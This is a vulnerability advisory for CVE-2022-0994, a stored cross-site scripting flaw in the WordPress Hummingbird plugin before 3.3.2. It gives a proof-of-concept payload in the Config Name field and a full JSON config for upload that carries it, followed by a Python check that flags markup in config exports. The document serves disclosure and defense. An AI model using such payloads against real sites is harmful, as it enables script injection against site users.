WordPress Hummingbird Cross Site Scripting

WordPress Hummingbird plugin versions prior to 3.3.2 suffer from a persistent cross-site scripting vulnerability.


MD5 | 9e53f7f26629cb6869e967753b4b4851

Title:
WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

References:
CVE-2022-0994

Author:
Taurus Omar

Description:
The plugin does not sanitise and escape the Config Name, which could allow high-privilege users, such as admins, to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Affects Plugins:
Hummingbird-performance - Fixed in version 3.3.2

Proof of Concept:
Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config

{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}
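
A defender-side check for the config upload path above, added here as an example and not part of the advisory or the plugin's own code: it walks a config export and reports every string field that contains an HTML tag, together with the HTML-escaped form that would render as plain text. The function names and the trimmed sample config are assumptions constructed for illustration.

```python
import html
import json
import re

# Start of an HTML tag (e.g. "<img", "</a", "<!--"); plain config labels never contain one.
MARKUP = re.compile(r"<\s*/?\s*[A-Za-z!]")


def iter_strings(node, path=""):
    """Yield (path, value) for every string in a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def audit_config(raw):
    """Return [(path, escaped_value)] for each string field that carries markup."""
    document = json.loads(raw)
    return [(path, html.escape(value, quote=True))
            for path, value in iter_strings(document)
            if MARKUP.search(value)]


# Constructed sample: a trimmed config in the layout shown above,
# using the advisory's own payload as the config name.
SAMPLE = json.dumps({
    "id": 1,
    "name": "<img src onerror=alert(/XSS/)>",
    "description": "Xss",
    "config": {
        "configs": {"settings": {"gravatar": {"enabled": True}}},
        "strings": {"gravatar": ["Gravatar cache - Active\n"]},
    },
    "plugin": "1081721",
})

if __name__ == "__main__":
    for field, escaped in audit_config(SAMPLE):
        print(f"markup in {field}: {escaped}")
```

Running it over config files before they are uploaded flags a name like the one in the proof of concept; upgrading to 3.3.2 remains the fix for the plugin itself.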

Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a

